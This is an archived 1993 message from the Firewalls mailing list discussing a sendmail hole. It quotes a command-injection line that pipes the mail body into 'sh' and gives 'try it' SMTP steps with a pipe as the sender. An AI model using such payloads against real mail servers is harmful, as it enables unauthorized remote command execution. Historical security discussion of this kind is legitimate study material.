Great Circle Associates Firewalls
(November 1993)
 

Indexed By Date: [Previous] [Next] Indexed By Thread: [Previous] [Next]

Subject: Re: Sendmail bug (feature ?) - is this it ?
From: scott @ santafe . edu
Date: Mon, 1 Nov 93 09:44:45 MST
To: Icarus Sparry <ccsis @ ss1 . bath . ac . uk>
Cc: Firewalls @ GreatCircle . COM, Steve Simmons <scs @ lokkur . dexter . mi . us>
In-reply-to: Your message at 15:56:28 on Mon, 01 November 1993
References: <199311011510 . AA21309 @ lokkur . dexter . mi . us> <9311011556 . aa13182 @ uk . ac . bath . ss1>

>>>>> "Icarus" == Icarus Sparry <ccsis @
 ss1 .
 bath .
 ac .
 uk> writes:

>> rcpt to: | sed 's 1,/^$/d' | sh
Icarus> ^^ these two characters should not be here.
Icarus> Icarus

uh, sorry... I'm not a sed user.  I prefer perl and I'm use to
s/pattern//g

Well, this isn't all THAT much of a public list-- so

after reading about the sendmail hole... and using the one clue that I
had where someone said "you'd know if it had been run on you because
of the bounced mail" ... it took about 5 minutes to guess this
*CURRENT* problem.

Try it:
telnet server smtp
mail from: |
rcpt to: bogusaddress
data



References:
Indexed By Date Previous: Re: Hijacking AFS
From: Bob Dew <rdew @ alw . nih . gov>
Next: Re: Hijacking AFS
From: "Perry E. Metzger" <pmetzger @ lehman . com>
Indexed By Thread Previous: Re: Sendmail bug (feature ?) - is this it ?
From: Icarus Sparry <ccsis @ ss1 . bath . ac . uk>
Next: Re: Sendmail bug (feature ?) - is this it ?
From: ajl @ Orion . MC . Duke . EDU (Arne J. Ludwig)

Google
 
Search Internet Search www.greatcircle.com